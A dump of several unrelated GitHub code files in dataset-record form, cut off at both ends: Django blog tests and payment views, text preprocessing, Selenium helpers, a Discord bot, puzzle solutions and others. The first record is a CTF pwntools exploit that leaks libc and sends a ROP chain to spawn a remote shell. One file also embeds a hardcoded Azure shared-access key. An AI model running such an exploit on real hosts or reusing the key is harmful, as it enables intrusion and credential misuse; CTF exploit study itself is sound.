\"./hacker_system_ver2\"\n\nunsorted_bin_off = 0x3c4b78\nsystem_off = 0x45390\nbin_sh_off = 0x18cd57\n\npop_rdi_ret = 0x400fb3\n\n#p = process(elf)\np = remote(\"111.230.149.72\", 10008)\n\ndef add(name, age, length, intro):\n p.recvuntil(\"> \")\n p.sendline(\"1\")\n p.recvuntil(\"input the hacker's name:\")\n p.sendline(name)\n p.recvuntil(\"input the hacker's age:\")\n p.sendline(str(age))\n p.recvuntil(\"input the introduce's length:\")\n p.sendline(str(length))\n p.recvuntil(\"input the intro:\")\n p.send(intro)\n\ndef printh(length, name):\n p.recvuntil(\"> \")\n p.sendline(\"2\")\n p.recvuntil(\"input name length:\")\n p.sendline(str(length))\n p.recvuntil(\"input hacker's name:\")\n p.send(name)\n \ndef delete(length, name):\n p.recvuntil(\"> \")\n p.sendline(\"3\")\n p.recvuntil(\"input name length:\")\n p.sendline(str(length))\n p.recvuntil(\"input hacker's name:\")\n p.send(name)\n\n\nadd(\"A\", 1, 0x100, \"\\n\")\nadd(\"A\", 1, 0x3, \"123\")\n\ndelete(2, \"A\\n\")\n\nprinth(2, \"A\\n\")\n\np.recvuntil(\"intro:\")\nlibc_base = u64(p.recv(6).ljust(8, \"\\x00\"))-unsorted_bin_off\nlog.info(\"libc_base: \"+hex(libc_base))\n\nsystem_addr = libc_base+system_off\nbin_sh_addr = libc_base+bin_sh_off\n\npayload = p8(0)*0x38\npayload += p64(pop_rdi_ret)\npayload += p64(bin_sh_addr)\npayload += p64(system_addr)\nprinth(0x50, payload)\n\np.interactive()\n","repo_name":"0x3f97/pwn","sub_path":"hgame2018/hacker-system2/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"16"} +{"seq_id":"1258608152","text":"soma = 0\n\nnum1 = int(input())\nnum2 = int(input())\n\nif num1 >= num2:\n maior = num1\n menor = num2\nelse:\n maior = num2\n menor = num1\n\nif maior % 2 == 0:\n maior -= 1\nelse:\n maior -= 2\n\nwhile maior > menor:\n soma += maior\n maior -= 2\n\nprint(soma)","repo_name":"niverton-felipe/URI_PYTHON","sub_path":"1071.py","file_name":"1071.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74408158087","text":"from django.urls import reverse\nfrom rest_framework.test import APITestCase\nfrom rest_framework import status\nfrom django.contrib.auth.models import User\nfrom django.db import transaction\n\nclass PostViewTest(APITestCase):\n def setUp(self):\n self.register_url = reverse('register')\n self.post_list_url = reverse('posts')\n self.user_data = {\n 'username': 'testuser',\n 'email': 'test@example.com',\n 'password': 'testpassword'\n }\n\n\n # Step 1: Create a user by hitting the registration endpoint\n response = self.client.post(self.register_url, self.user_data, format='json')\n # print(response.data)\n # self.assertEqual(response.data['status'], status.HTTP_201_CREATED)\n self.token = response.data['data']['token']\n \n self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.token}')\n\n def create_single_post(self):\n post_data = {'title': 'title', 'body': 'body'}\n\n response = self.client.post(self.post_list_url, post_data, format='json')\n return response\n\n def create_post(self):\n for i in range(5):\n post_data = {'title': f'title {i+1}', 'body': f'body {i+1}'}\n\n response = self.client.post(self.post_list_url, post_data, format='json')\n\n def test_create_posts(self):\n for i in range(5):\n post_data = {'title': f'title {i+1}', 'body': f'body {i+1}'}\n\n response = self.client.post(self.post_list_url, post_data, format='json')\n \n response = self.client.get(self.post_list_url)\n # self.assertEqual(response.data['status'], status.HTTP_200_OK)\n self.assertEqual(len(response.data['data']), 5)\n\n\n def test_get_all_posts(self):\n self.create_post()#\n response = self.client.get(self.post_list_url)\n self.assertEqual(response.data['status'], status.HTTP_200_OK)\n self.assertEqual(len(response.data['data']), 5)\n\n def test_get_single_post(self):\n self.create_post()\n response = self.client.get(\"/api/posts/1\")\n self.assertEqual(response.data['status'], status.HTTP_200_OK)\n\n def test_update_post(self):\n self.create_post()\n response = self.client.put(\"/api/posts/1\",{'title':'updated title','body':'updated body'},format='json')\n self.assertEqual(response.data['status'], status.HTTP_200_OK)\n\n def test_delete_post(self):\n self.create_post()\n response = self.client.delete(\"/api/posts/1\")\n self.assertEqual(response.data['status'], status.HTTP_204_NO_CONTENT)\n \n","repo_name":"sarangkkl/blog_api","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35687358540","text":"import csv\nimport re\nimport string\nfrom time import sleep\n\nfrom nltk import PorterStemmer\nfrom nltk.corpus import stopwords\n\n\ndef preprocess_emotions_script():\n print()\n print(\"*** ESECUZIONE IN BACKGROUND >>> Preprocessing delle emozioni in corso...\")\n sleep(0.2)\n # # # TOKENIZZAZIONE # # #\n emoticons_str = r\"\"\"\n (?:\n [:=;] # Eyes\n [oO\\-]? # Nose (optional)\n [D\\)\\]\\(\\]/\\\\OpP] # Mouth\n )\"\"\"\n\n regex_str = [\n emoticons_str,\n r'<[^>]+>', # HTML tags\n r'(?:@[\\w_]+)', # @-mentions\n r\"(?:\\#+[\\w_]+[\\w\\'_\\-]*[\\w_]+)\", # hash-tags\n r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-f][0-9a-f]))+', # URLs\n\n r'(?:(?:\\d+,?)+(?:\\.?\\d+)?)', # numbers\n r\"(?:[a-z][a-z'\\-_]+[a-z])\", # words with - and '\n r'(?:[\\w_]+)', # other words\n r'(?:\\S)' # anything else\n ]\n\n tokens_re = re.compile(r'(' + '|'.join(regex_str) + ')', re.VERBOSE | re.IGNORECASE)\n emoticon_re = re.compile(r'^' + emoticons_str + '$', re.VERBOSE | re.IGNORECASE)\n\n def tokenize(s):\n return tokens_re.findall(s)\n\n def preprocess(s, lowercase=False):\n tokens = tokenize(s)\n # if lowercase:\n # tokens = [token if emoticon_re.search(token) else token.lower() for token in tokens]\n return tokens\n\n punteggiatura = list(string.punctuation) ### La punteggiatura la teniamo in conto\n stop_words = stopwords.words('english') + punteggiatura\n ps = PorterStemmer()\n # # # ------------- # # #\n\n with open('text_emotion.csv', 'r') as emotion_file:\n reader = csv.reader(emotion_file, delimiter=',')\n for row in reader:\n content = row[3]\n emotion = row[1]\n # print(line)\n # print()\n content = re.sub(r\"(?:\\@|https?\\://)\\S+\", \"\", content)\n # content = re.sub(r\"http\\S+\", \"\", content)\n # print(\"TOKENIZZAZIONE TWEET [\",i,\"]\")\n # print(\"TESTO TWEET > \", preprocess(tweet)) # stampa dei token del testo dei tweets\n # print(\"\\n\")\n # i = i + 1\n # print(content)\n\n # lista dei termini senza le stop words (SW)\n content_prepro = [ps.stem(term) + \" \" for term in preprocess(content) if term not in stop_words]\n\n # print(content_prepro)\n # print()\n # print(emotion)\n\n with open('text_emotion_prepro.csv', 'a+', encoding='utf8') as file:\n file.writelines(content_prepro)\n file.writelines(\",\")\n file.writelines(emotion)\n file.write(\"\\n\")\n print(\"*** Completato! Puoi procedere...\\n\")","repo_name":"Andry92/emotional-film-advice","sub_path":"Preprocess_Emotions.py","file_name":"Preprocess_Emotions.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18471565575","text":"class Solution:\r\n def carFleet(self, target, position, speed):\r\n output, maximum = 0\r\n times = [float(target - p) / s for p, s in sorted(zip(position, speed),reverse = True)] \r\n for time in times:\r\n if time > maximum:\r\n maximum = time\r\n output += 1\r\n\r\n return output\r\n","repo_name":"KnightDanny/A2SV","sub_path":"Car Fleet.py","file_name":"Car Fleet.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9781558230","text":"from audioop import reverse\nimport json\nimport math\nfrom wsgiref import headers\nfrom xml.dom import ValidationErr\nfrom numpy import append\nfrom .models import Choice_Model, darmangar, info, darmanjo_form\nfrom django.core.paginator import Paginator\nfrom django.urls import reverse\nfrom django.shortcuts import render, HttpResponseRedirect, HttpResponse, get_object_or_404, get_list_or_404, redirect\nfrom django.urls import reverse_lazy\nfrom django.views.generic import TemplateView, CreateView,FormView, DetailView\nfrom .forms import infoss, darmanjo_formss\nfrom .extentions.excel_validation import exel_reader\nimport xlrd\nfrom django.utils.crypto import get_random_string\nimport random\nfrom pypep import Pasargad, ApiError\nimport pandas as pd\nimport datetime\n\nclass home(TemplateView):\n template_name = \"forms/home.html\"\n\n\n\n#in yek method form baraye in ast ke file excel ra daryaft konad\ndef get_name(request):\n if request.method == 'POST':\n form = infoss(request.POST, request.FILES)\n if form.is_valid():\n upl = form.cleaned_data['upl']\n form.save()\n\n wb = xlrd.open_workbook(\"media/upload-file/\" + str(upl))\n sh = wb.sheet_by_index(0)\n columns = sh.ncols - 2\n num_rows = sh.nrows - 1\n print(num_rows)\n if sh.cell_value(0,0) == \"نام\" and sh.cell_value(0,1) == \"خانوادگی\" and sh.cell_value(0,2) == \"موبایل\" and sh.cell_value(0,3) == \"ایمیل\":\n for i in range(num_rows):\n the_slug = get_random_string(3,'0123456789') # 8 characters, only digits. \n the_slugs = get_random_string(3,'0123456789')\n m = str(the_slug) + \"-\" + str(the_slug)\n o = i + 1\n\n d = sh.cell_value(o,2)\n\n a = info.objects.create( mobile=d)\n return HttpResponse(\"فایل با موفقیت ثبت شد\")\n else:\n return HttpResponse(\"مشکلی در فایل وجود دارد احتمالا از قوانین فایل پیروی نکردید\")\n #return HttpResponseRedirect('home')\n else:\n form = infoss()\n\n return render(request, 'forms/form.html', {'form': form})\n\n\n\nclass Submit_Form(TemplateView):\n template_name = \"forms/submit.html\"\n\n\n\n\n#function form baraye form darmanjo\ndef detailsick(request, slug):\n deta = get_object_or_404(info, slug=slug)\n detas = info.objects.get(slug=slug)\n darm = None\n informations = None\n page_obj = None\n darms = []\n rel_info = None\n list_count =[]\n #form\n if request.method == \"POST\":\n form = darmanjo_formss(request.POST)\n a = request.POST\n if form.is_valid():\n global talk_about\n talk_about = form.cleaned_data['talk_about']\n form.save(commit=False)\n print(\"aa\"+str(rel_info))\n darm = darmangar.objects.filter(keyword__in=talk_about.split())\n count = darm.count()\n half_count = math.ceil(count/2)\n print(half_count)\n\n for x in range(half_count):\n list_count.append(x+1)\n\n print(list_count)\n print(darms)\n informations = darmanjo_form.objects.create(information=deta, talk_about=talk_about)\n else:\n form = darmanjo_formss()\n return render(request, \"forms/detailsick.html\", {'deta':deta,'detas':detas,'form':form,'darm':darm,'page_obj':page_obj,'darms':darms, 'list_count':list_count, 'informations':informations})\n\n#detail form\ndef detailform(request, slug, pk, id):\n #for url filter\n darmanjo_fo = darmanjo_form.objects.get(id=id)\n fname = None\n lname = None\n deta = info.objects.filter(slug=slug)\n deta1 = info.objects.get(slug=slug)\n darman = get_object_or_404(darmangar, pk=pk)\n detass = info.objects.get(slug=slug)\n c = info.objects.get(slug=slug)\n #informations = darmanjo_form.objects.update(talk_about=detas,rel_info=darman, information = detas)\n informations = darmanjo_form.objects.filter(information__fname__icontains=deta1.fname, information__lname__icontains=deta1.lname,id=darmanjo_fo.id).update(rel_info=darman, information=detass)\n \n return render(request, 'forms/detailform.html', {'deta':deta,'darman':darman,'detass':detass,'darmanjo_fo':darmanjo_fo})\n\n\nclass Unsubmit_Payment(TemplateView):\n template_name = \"forms/Unsubmit.html\"\n\n#payment\ndef payment(request, slug,id):\n\n darmanjo_fo = darmanjo_form.objects.get(id=id)\n date = datetime.datetime.now()\n global invoice_number\n payment_price = darmangar.objects.get(slug=slug)\n global amount\n amount = int(payment_price.price)\n print(payment_price)\n url = f'http://127.0.0.1:8000/checkss/{payment_price.slug}/{darmanjo_fo.id}/'\n pasargad = Pasargad(4916435, 2148370, url, 'cert.xml')\n payment_url = pasargad.redirect(\n amount=amount,\n invoice_number=random.randint(0, 9000000),\n invoice_date=str(date),\n )\n url = 'http://127.0.0.1:8000/checkss/{payment_price.slug}/{darmanjo_fo.id}/'\n return HttpResponseRedirect(payment_url, url)\n\ndef check_transaction(request,slug,id):\n payment_price = darmangar.objects.get(slug=slug)\n darmanjo_fo = darmanjo_form.objects.get(id=id)\n global amount\n amount = int(payment_price.price)\n print(payment_price)\n pasargad = Pasargad(4916435, 2148370, 'http://127.0.0.1:8000/home', 'cert.xml')\n print(\"okey\")\n TransactionReferenceID = request.GET.get('tref')\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n print(TransactionReferenceID)\n print(InvoiceNumber)\n print(InvoiceDate)\n try:\n response = pasargad.check_transaction(\n reference_id=TransactionReferenceID,\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n \n with open('data.txt', 'a') as f:\n data = json.dumps(response)\n data1 = str(data)\n f.write(data1+\"\\n\")\n print(\"okey\")\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n response = pasargad.verify_payment(\n amount=amount,\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n informations = darmanjo_form.objects.filter(id=darmanjo_fo.id).update(payment=True)\n print(\"sabt shod\")\n #informations = darmanjo_form.objects.create()\n return HttpResponseRedirect(reverse('form:home'))\n except Exception:\n return HttpResponseRedirect(reverse('form:Unsubmit'))\n\n\n #response = json.loads(response.read().decode('utf-8'))\n\n\n#f'http://127.0.0.1:8000/checkss/{payment_price.slug}/{darmanjo_fo.id}/'\n#f'http://127.0.0.1:8000/checkss/{payment_price.slug}/{deta.pk}/{deta.fname}/{darmanjo_fo.id}/'\n\n\n\"\"\"\n if request.method == 'GET':\n informations = darmanjo_form.objects.filter(id=darmanjo_fo.id).update(payment=True)\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n response = pasargad.verify_payment(\n amount=amount,\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n #informations = darmanjo_form.objects.create()\n return HttpResponse(\"okey\")\n except Exception:\n return HttpResponse(\"okey\")\n\"\"\"\n\"\"\"\n pasargad = Pasargad(4916435, 2148370, f'http://127.0.0.1:8000/home', 'cert.xml')\n response = pasargad.check_transaction(\n reference_id=request.GET['tref'],\n invoice_number=request.GET['iN'],\n invoice_date=request.GET['iD'],\n )\n with open('data.txt', 'a') as f:\n data = json.dumps(response)\n data1 = str(data)\n f.write(data1+\"\\n\")\n \n data = json.dumps(response)\n print(data)\n x = data.get(\"IsSuccess\")\n print(\"<--------------------------> \"+x)\n if x == \"True\":\n if request.method == 'GET':\n informations = darmanjo_form.objects.filter(information__fname__icontains=deta1.fname, information__lname__icontains=deta1.lname,id=darmanjo_fo.id).update(payment=True)\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n response = pasargad.verify_payment(\n amount=\"17000\",\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n #informations = darmanjo_form.objects.create()\n return HttpResponse(\"okey\")\n else:\n return HttpResponse(\"False\")\n\n\"\"\"","repo_name":"javadhoseeinzade/first-project","sub_path":"Forms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33634441905","text":"#!/bin/python\nimport time\n#import urllib\nfrom urllib.parse import urlparse\nimport hmac\nimport hashlib\nimport base64\n\ndef get_auth_token(sb_name, eh_name, sas_name, sas_value):\n \"\"\"\n Returns an authorization token dictionary \n for making calls to Event Hubs REST API.\n \"\"\"\n uri = urlparse(f\"https://{sb_name}.servicebus.windows.net/{eh_name}\")\n \n sas = sas_value.encode('utf-8')\n expiry = str(int(time.time() + 10000))\n string_to_sign = f\"{uri}\\n{expiry}\".encode('utf-8')\n signed_hmac_sha256 = hmac.HMAC(sas, string_to_sign, hashlib.sha256)\n signature = urlparse(base64.b64encode(signed_hmac_sha256.digest()))\n return {\"sb_name\": sb_name,\n \"eh_name\": eh_name,\n \"token\":'SharedAccessSignature sr={}&sig={}&se={}&skn={}' \\\n .format(uri, signature, expiry, sas_name)\n }\n\nprint ( get_auth_token('sapps-eventdriven-servicebus', 'upper-case', 'listner', 'ZlgMkVC4TmEMpS8QFPth1TrdHC98mb1YL+ASbJuUQeU=')['token'] )\n\n","repo_name":"wkaczurba/wkaczurba.github.io","sub_path":"docs/azure/sas/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8541002866","text":"\"\"\"An example with GIF generation at the end. How cool is that!\n\nThis example requires the Moviepy library installed (pip install moviepy).\n\n\"\"\"\nfrom Bio import Entrez, SeqIO\nimport moviepy.editor as mpe\nfrom moviepy.video.io.bindings import mplfig_to_npimage\nimport matplotlib.pyplot as plt\nfrom dna_features_viewer import BiopythonTranslator, CircularGraphicRecord\n\n# DOWNLOAD THE PLASMID's RECORD FROM NCBI\n\nhandle = Entrez.efetch(\n db=\"nucleotide\", id=1473096477, rettype=\"gb\", retmode=\"text\"\n)\nrecord = SeqIO.read(handle, \"genbank\")\n\n# CREATE THE GRAPHIC RECORD WITH DNA_FEATURES_VIEWER\n\ncolor_map = {\n \"rep_origin\": \"yellow\",\n \"CDS\": \"orange\",\n \"regulatory\": \"red\",\n \"misc_recomb\": \"darkblue\",\n \"misc_feature\": \"lightblue\",\n}\ntranslator = BiopythonTranslator(\n features_filters=(lambda f: f.type not in [\"gene\", \"source\"],),\n features_properties=lambda f: {\"color\": color_map.get(f.type, \"white\")},\n)\ntranslator.max_line_length = 15\ngraphic_record = translator.translate_record(\n record, record_class=CircularGraphicRecord\n)\ngraphic_record.labels_spacing = 15\n\n# ANIMATE INTO A GIF WITH MOVIEPY\n\nduration = 5\n\n\ndef make_frame(t):\n top_nucleotide_index = t * graphic_record.sequence_length / duration\n graphic_record.top_position = top_nucleotide_index\n ax, _ = graphic_record.plot(figure_width=8, figure_height=11)\n ax.set_ylim(top=2)\n np_image = mplfig_to_npimage(ax.figure)\n plt.close(ax.figure)\n return np_image\n\n\nclip = mpe.VideoClip(make_frame, duration=duration)\nsmall_clip = clip.crop(x1=60, x2=-60, y1=100, y2=-100).resize(0.5)\nsmall_clip.write_gif(\"example_with_gif.gif\", fps=15)\n","repo_name":"Edinburgh-Genome-Foundry/DnaFeaturesViewer","sub_path":"examples/example_with_gif.py","file_name":"example_with_gif.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":508,"dataset":"github-code","pt":"16"} +{"seq_id":"30584530761","text":"import os\n\nfrom datetime import datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.support.select import Select\nimport time\nfrom common.file import CommonFile\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nclass BaseWebDriver:\n def __init__(cls):\n pass\n \n driver: WebDriver = None\n \n @classmethod\n def start_driver(cls):\n options = webdriver.ChromeOptions()\n options.add_argument('--lang=ja-JP')\n options.add_experimental_option('detach', True)\n cls.driver = webdriver.Chrome(ChromeDriverManager().install(),options=options)\n cls.driver.maximize_window()\n\n @classmethod\n def stop_driver(cls):\n cls.driver.quit()\n \n @classmethod\n def log_current_url(cls):\n print('current URL: ', cls.driver.current_url)\n\n @classmethod\n def get_screenshot(cls, id: str = \"temp\", \n prefix: str = \"\", suffix: str = \"\"):\n now = datetime.now()\n prefix = f\"{prefix}_\" if prefix else \"\"\n suffix = f\"_{suffix}\" if suffix else \"\"\n file_name = f\"{id}_{prefix}{now.strftime('%Y%m%d%H%M%S%f')}{suffix}.png\"\n dir_path = f\"{os.getcwd()}/screenshots/\"\n file_path = f\"{dir_path}{file_name}\"\n \n if not CommonFile.exists_path(dir_path):\n CommonFile.make_directory(dir_path)\n\n print(f'screenshot:{file_path}')\n screenshot = cls.driver.get_screenshot_as_png()\n \n CommonFile.make(file_path, screenshot, mode='wb+')\n\n @classmethod\n def switch_to_window(cls, index=-1):\n # seleniumが速すぎるため少し待つ\n cls.wait(0.5)\n \n windows = cls.driver.window_handles\n if index == -1:\n index = len(windows) - 1\n cls.driver.switch_to.window(windows[index])\n\n @classmethod\n def find_wait_clickable_element(cls, selector, wait_seconds=5):\n wait = WebDriverWait(cls.driver, wait_seconds)\n elm = wait.until(EC.element_to_be_clickable(selector))\n return elm\n \n @classmethod\n def find_wait_located_element(cls, selector, wait_seconds=10):\n wait = WebDriverWait(cls.driver, wait_seconds)\n elm = wait.until(EC.visibility_of_element_located(selector))\n return elm\n\n @classmethod\n def wait_loading(cls, selector, wait_seconds=10):\n # 判定用のエレメントが読込されるまで待機する\n wait = WebDriverWait(cls.driver, wait_seconds)\n elm = wait.until(EC.visibility_of_element_located(selector))\n \n @classmethod\n def wait(cls, wait_seconds=1):\n time.sleep(wait_seconds)\n \n @classmethod\n def clear_text(cls, elm: WebElement):\n elm.clear()\n \n @classmethod\n def input_text(cls, elm: WebElement, value):\n cls.clear_text(elm)\n elm.send_keys(value)\n \n @classmethod\n def input_text_add(cls, elm: WebElement, value):\n elm.send_keys(value)\n \n @classmethod\n def input_checkbox(cls, elm: WebElement, is_check: bool):\n is_checked = elm.is_selected()\n if is_checked == is_check:\n return\n elm.click()\n\n @classmethod\n def input_select(cls, elm: WebElement, value):\n Select(elm).select_by_value(value)\n \n @classmethod\n def input_radio(cls, name: str , value):\n elm_list = cls.driver.find_elements(by=By.NAME, value=name)\n elm = next(filter(lambda x:x.get_attribute('value') == value, elm_list))\n elm.click()\n \n @classmethod\n def select_radio(cls, elm: WebElement):\n elm.click()\n ","repo_name":"kazuki-ikeya/seleniumSample","sub_path":"python/src/base/drivers/base_web_driver.py","file_name":"base_web_driver.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25821361110","text":"from uplogic.nodes import ULActionNode\nfrom uplogic.nodes import ULOutSocket\nfrom uplogic.ui import Canvas\n\n\nclass ULCreateUICanvas(ULActionNode):\n def __init__(self):\n ULActionNode.__init__(self)\n self.condition = None\n self._canvas = None\n self._done = False\n self.OUT = ULOutSocket(self, self._get_done)\n self.CANVAS = ULOutSocket(self, self._get_canvas)\n\n def _get_done(self):\n return self._done\n\n def _get_canvas(self):\n return self._canvas\n\n def evaluate(self):\n self._done = False\n if not self.get_input(self.condition):\n return\n self._canvas = Canvas()\n self._done = True\n \n","repo_name":"UPBGE/uplogic","sub_path":"uplogic/nodes/actions/createuicanvas.py","file_name":"createuicanvas.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"70651876167","text":"import asyncio\nimport nextcord\nfrom nextcord.ext import commands\nfrom typing import Union\n\nimport os, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom constantes import tokenReact\n\ndef main() -> None:\n intentsBot = nextcord.Intents.default()\n intentsBot.members = True\n intentsBot.messages = True\n intentsBot.message_content = True\n bot = commands.Bot(command_prefix=\",\", help_command=None, intents = intentsBot)\n\n @bot.command(name=\"react\")\n async def react(ctx, *emojis: Union[nextcord.Emoji, str]):\n reference = ctx.message.reference\n\n if reference:\n msg = await ctx.channel.fetch_message(reference.message_id)\n for emoji in emojis:\n await msg.add_reaction(emoji)\n\n await ctx.message.delete()\n\n loop = asyncio.get_event_loop()\n loop.create_task(bot.start(tokenReact))\n loop.run_forever()\n\nmain()\n","repo_name":"fabnem12/squadro-bot","sub_path":"discordUtils/reactbot.py","file_name":"reactbot.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"11890741601","text":"def from_snafu(snafu):\n return sum({ '=': -2, '-': -1, '0': 0, '1': 1, '2': 2 }[v] * (5 ** i) for i, v in enumerate(reversed(list(snafu))))\n\ndef to_snafu(number):\n # First convert the number to base 5\n digits = []\n while number:\n digits.append(number % 5)\n number //= 5\n digits.append(0)\n\n # Convert overflow 3s, 4s and 5s to next digit\n for i, digit in enumerate(digits):\n if digit > 2: digits[i] -= 5; digits[i+1] += 1\n\n if digits[-1] == 0: digits = digits[:-1]\n\n return ''.join([{ -2: '=', -1: '-', 0: '0', 1: '1', 2: '2' }[x] for x in reversed(digits)])\n\nwith open(\"./day25/input.txt\") as f:\n lines = f.read().splitlines()\n\npart1 = to_snafu(sum([from_snafu(x) for x in lines]))\nprint(part1)\n","repo_name":"craigfe/advent-of-code-2022","sub_path":"day25/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12446040898","text":"from __future__ import annotations\nfrom django.contrib.auth import get_user_model\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.core.mail import send_mail\nimport uuid\nimport time\nimport random\nfrom ..dto.create_user import CreateUserDTO\nfrom ..exceptions import (\n ConfirmationCodeExpired,\n ConfirmationCodeDoesNotExist\n)\nfrom ...models import EmailConfirmationCode\n\n\ndef add_user(data: CreateUserDTO) -> None:\n user_model = get_user_model()\n created_user = user_model.objects.create_user(username=data.username,\n email=data.email,\n password=data.password,\n is_active=False)\n\n confirmation_code = str(uuid.uuid4())\n code_expiration_time = int(time.time()) + settings.CONFIRMATION_CODE_LIFETIME\n confirmation_url = settings.SERVER_HOST + reverse('confirm') + f'?code={confirmation_code}'\n EmailConfirmationCode.objects.create(\n user=created_user,\n expiration=code_expiration_time,\n code=confirmation_code\n )\n send_mail(\n subject='Confirm your email',\n message=f\"Please confirm your email by clicking the link below:\\n\\n{confirmation_url}\",\n from_email=settings.EMAIL_FROM,\n recipient_list=[data.email]\n )\n\n\ndef confirmation_user(confirmation_code: str) -> None:\n try:\n data = EmailConfirmationCode.objects.get(code=confirmation_code)\n\n except EmailConfirmationCode.DoesNotExist:\n raise ConfirmationCodeDoesNotExist('Confirmation Code Does Not Exist')\n\n if time.time() > data.expiration:\n raise ConfirmationCodeExpired\n\n user = data.user\n user.is_active = True\n user.save()\n\n data.delete()\n","repo_name":"Anastasiia323/blog_app","sub_path":"sourse/blogging_app/core/busines_logic/servises/create_user.py","file_name":"create_user.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38134018540","text":"import random\nimport math\n\n#Tournament Pools\nplayernum = int(input(\"How many players are competing: \"))\npoolnum = int(input(\"How many pools: \"))\nroundnum = int(input(\"How many rounds: \"))\nfinalnum = int(input(\"How many people in finals: \"))\nsplitnum = math.ceil(playernum / poolnum)\n\ndef createrecords(playernum):\n matchhistory = {}\n for player in range(1, playernum + 1):\n matchhistory[player] = [0, 0, 0] #games, wins, points\n return matchhistory\n\ndef splitlist(poolnum, splitnum, players, pools):\n for num in range(poolnum):\n print(players[splitnum * num: splitnum * (num+1)])\n pools.append(players[splitnum * num: splitnum * (num+1)])\n\ndef poollist(pools, splitnum):\n totalmatch = 0\n for group in pools:\n poolmatch = []\n print()\n print(\"Pool \" + str(pools.index(group) + 1) + \":\")\n for num in range(0, len(group)):\n for x in range(num + 1, len(group)):\n poolmatch.append([group[x], group[num]])\n totalmatch += 1\n poolmatch = random.sample(poolmatch, len(poolmatch))\n for num in range(len(poolmatch)):\n print(\"Match \" + str(num + 1) + \": \" + str(poolmatch[num][0]) + \" vs \" + str(poolmatch[num][1]))\n if len(poolmatch) == 0:\n print(\"No matches for this pool!\")\n return totalmatch\n \ndef matchresult(matchhistory):\n #draws\n confirm = False\n while not confirm:\n print(\"Please enter match stats!\")\n draws = input(\"Was the match a draw? Type Y or N.\")\n if draws is \"Y\" or draws is \"y\":\n player1 = int(input(\"Player 1: \"))\n player2 = int(input(\"Player 2: \"))\n player1points = float(input(\"Player 1's Points: \"))\n player2points = float(input(\"Player 2's Points: \"))\n else:\n winner = int(input(\"Winner: \"))\n loser = int(input(\"Loser: \"))\n winnerpoints = float(input(\"Winner's Points: \"))\n loserpoints = float(input(\"Loser's Points: \"))\n query = input(\"Confirm? Type Y or N.\")\n if query is \"Y\":\n confirm = True\n else:\n confirm = False\n print(\"Match recorded!\")\n if draws is \"Y\" or draws is \"y\":\n matchhistory[player1][0] += 1\n matchhistory[player2][0] += 1\n matchhistory[player1][1] += .5\n matchhistory[player2][1] += .5\n matchhistory[player1][2] += player1points\n matchhistory[player2][2] += player2points\n else:\n matchhistory[winner][0] += 1\n matchhistory[winner][1] += 1\n matchhistory[loser][0] += 1\n matchhistory[winner][2] += winnerpoints\n matchhistory[loser][2] += loserpoints\n\ndef decidefinals(finalnum, matchhistory, playernum):\n criteria = {}\n finals = []\n for player in range(1, playernum + 1):\n criteria[player] = matchhistory[1] / matchhistory[0]\n gameratio = set(criteria.values())\n while finals < finalnum:\n for item in criteria:\n if criteria[item] == max(gameratio):\n del(criteria[item])\n finals.append(item)\n gameratio.remove(max(gameratio))\n \n\ndef generatematch(playernum, poolnum, roundnum, splitnum):\n matchhistory = createrecords(playernum)\n print(matchhistory)\n for num in range(roundnum):\n pools = []\n players = random.sample(range(1, playernum + 1), playernum)\n splitlist(poolnum, splitnum, players, pools)\n print()\n print(\"Round \" + str(num + 1) + \":\")\n print(pools)\n for num in range(poollist(pools, 